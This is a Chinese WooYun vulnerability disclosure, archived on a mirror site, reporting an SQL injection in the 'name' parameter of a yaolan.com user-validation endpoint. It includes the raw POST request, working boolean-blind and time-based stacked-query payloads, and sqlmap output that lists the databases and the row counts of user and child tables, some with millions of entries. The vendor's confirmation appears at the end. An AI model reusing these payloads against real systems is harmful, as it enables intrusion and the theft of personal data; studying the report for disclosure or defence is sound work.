乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-07: 细节已通知厂商并且等待厂商处理中 2015-06-08: 厂商已经确认,细节仅向厂商公开 2015-06-18: 细节向核心白帽子及相关领域专家公开 2015-06-28: 细节向普通白帽子公开 2015-07-08: 细节向实习白帽子公开 2015-07-23: 细节向公众公开
【HD】 以团队之名 以个人之荣耀 共建网络安全-------------------------------------------------能上首页不?
下面为本次测试的详细内容POST数据包:
POST /AjaxValidate.aspx HTTP/1.1Host: user.yaolan.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://user.yaolan.com/RegisterC.aspx?desc=&back_url=http%3a%2f%2fjifen.yaolan.com%2f&immediately=FalseContent-Length: 21Cookie: __yl__test__cookies=1433598576400; _yl_ct=1433598576401; _yl_fr=4; _yl_utmb=1433598446840; _yl_utma=1433598446837.1433598446840; _yl_ft=1433598446836; _yl_nvid=ab316044bfbd5f5e4994d115bc55d823; _yl_pageid=AFfq22,RJrqqu,A7RjMr; Hm_lvt_04a8007d069875ec6d7ac710d65c2b92=1433598448; Hm_lpvt_04a8007d069875ec6d7ac710d65c2b92=1433598577; login_bg_num=1; base_domain_c454868876824458837735f572c90c75=yaolan.com; stay_bg=1; ASP.NET_SessionId=hi5hacmbagucv2ysmqlpymjx; theme=c; __CT_Data=gpv=1&apv_4579_www03=1&cpv_4579_www03=1; WRUID=708976282.1226983508; WRIgnore=true; xnsetting_c454868876824458837735f572c90c75=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22shareAuth%22%3Anull%7DX-Forwarded-For: 8.8.8.8'Connection: keep-alivePragma: no-cacheCache-Control: no-cachetype=1&name=wooyun999
name 参数未过滤 可注入 2库 (具体参数见下图 以及漏洞证明)
两个库我都看了下数据量 information_schema 里的数据量不大 但是 user_yaolan_com 里的数据量 大大滴的啊
Database: user_yaolan_com+-------------------------+---------+| Table | Entries |+-------------------------+---------+| LoginInfo | 6740391 || ChildInfo | 6740373 || UserBaseInfo | 6740285 || UserExtInfo | 6740162 || MarkInfo | 6739086 || iur_child_birth_based | 5483060 || UserInterestInfo | 1021602 || UserSource | 1006414 || ChildInterestInfo | 496016 || CoinInfo | 444240 || NoDefaultChildInfo | 258726 || UserSignature | 81646 || BoroughList | 2870 || word_filter_reg | 2809 || CityList | 341 || CountryList | 243 || UserVerifyDetail | 136 || UserInterestDetailList | 107 || UserGeekDetail | 48 || ChildInterestDetailList | 40 || UserInterestList | 40 || ProvinceList | 35 || ChildInterestList | 22 || TradeList | 17 || GradeList | 16 || ProfessionList | 12 || IncomeList | 8 || EducationList | 5 || GeekList | 4 || VerifyList | 1 |+-------------------------+---------+
ChildInfo 表内容(证明数据量需要 见谅)
其他表就不深入了
POST parameter 'name' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] nsqlmap identified the following injection points with a total of 270 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1&name=wooyun999' AND 7721=7721 AND 'VdGz'='VdGz Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: type=1&name=wooyun999';(SELECT * FROM (SELECT(SLEEP(5)))wPGn)#---[22:19:20] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: MySQL 5.0.11[22:19:20] [INFO] fetching database names[22:19:20] [INFO] fetching number of databases[22:19:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[22:19:20] [INFO] retrieved: 2[22:19:21] [INFO] retrieved: information_schema[22:19:54] [INFO] retrieved: use[22:20:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the requestr_yaolan_comavailable databases [2]:[*] information_schema[*] user_yaolan_com[22:20:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\user.yaolan.com'[*] shutting down at 22:20:44
良心厂商 上百万的数据 有礼物不?
危害等级:高
漏洞Rank:20
确认时间:2015-06-08 17:20
漏洞确认,正在修复。感谢乌云白帽子提醒。
暂无